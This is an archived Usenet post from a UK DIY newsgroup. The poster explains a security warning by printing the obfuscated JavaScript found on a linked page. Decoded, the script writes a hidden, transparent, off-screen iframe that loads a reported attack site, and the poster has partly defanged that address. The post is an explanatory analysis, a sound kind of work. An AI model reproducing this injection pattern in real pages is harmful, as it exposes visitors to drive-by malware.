Thread: wee disposal
View Single Post
  #9   Report Post  
Posted to uk.d-i-y
Andy Burns[_6_] Andy Burns[_6_] is offline
external usenet poster
  
Posts: 215
Default wee disposal
Cash wrote:

This may be a false positive, but each time I try to access the link that
you give it is blocked by Norton Internet Security in both Outlook Explorer
and Firefox - giving the message that my computer was being 'attacked by'
the HTTP Malicious Toolkit Variant Activity 2.

It contains an obfuscated section of Javascript

script type="text/javascript"
var kPvOkYUlTEBvLmAPjYUP =
"nd60nd105nd102nd114nd97nd109nd101nd32nd119nd105nd 100nd116nd104nd61nd34nd52nd56nd48nd34nd32nd104nd10 1nd105nd103nd104nd116nd61nd34nd54nd48nd34nd32nd115 nd114nd99nd61nd34nd104nd116nd116nd112nd58nd47nd47n d104nd105nd116nd45nd115nd101nd110nd100nd101nd114nd 115nd46nd99nd110nd47nd102nd105nd110nd100nd47nd105n d110nd46nd99nd103nd105nd63nd49nd50nd34nd32nd115nd1 16nd121nd108nd101nd61nd34nd98nd111nd114nd100nd101n d114nd58nd48nd112nd120nd59nd32nd112nd111nd115nd105 nd116nd105nd111nd110nd58nd114nd101nd108nd97nd116nd 105nd118nd101nd59nd32nd116nd111nd112nd58nd48nd112n d120nd59nd32nd108nd101nd102nd116nd58nd45nd53nd48nd 48nd112nd120nd59nd32nd111nd112nd97nd99nd105nd116nd 121nd58nd48nd59nd32nd102nd105nd108nd116nd101nd114n d58nd112nd114nd111nd103nd105nd100nd58nd68nd88nd73n d109nd97nd103nd101nd84nd114nd97nd110nd115nd102nd11 1nd114nd109nd46nd77nd105nd99nd114nd111nd115nd111nd 102nd116nd46nd65nd108nd112nd104nd97nd40nd111nd112n d97nd99nd105nd116nd121nd61nd48nd41nd59nd32nd45nd10 9nd111nd122nd45nd111nd112nd97nd99nd105n
d116nd121nd58nd48nd34nd62nd60nd47nd105nd102nd114nd 97nd109nd101nd62";
var LQweQmnfGaTqpPFaoZLH = kPvOkYUlTEBvLmAPjYUP.split("nd");
var dNCoADEkcYAnpwSFjFkp = "";
for (var fDfVTkvHKHOnVRcVUgGw = 1;
fDfVTkvHKHOnVRcVUgGw LQweQmnfGaTqpPFaoZLH.length;
fDfVTkvHKHOnVRcVUgGw++)
{
dNCoADEkcYAnpwSFjFkp +=
String.fromCharCode(LQweQmnfGaTqpPFaoZLH[fDfVTkvHKHOnVRcVUgGw]);
}
document.write(dNCoADEkcYAnpwSFjFkp)/script

which inserts the following html (without the x's) into the document

iframe width="480" height="60" style="border: 0px none ; position:
relative; top: 0px; left: -500px; opacity: 0;"
src="http://xxx.hit-senders.cn.xxx/find/in.cgi?12"/

The frame content seems to be the reported attack site, according to Google.

http://safebrowsing.clients.google.c...enders.cn/find
Reply With QuoteReply With Quote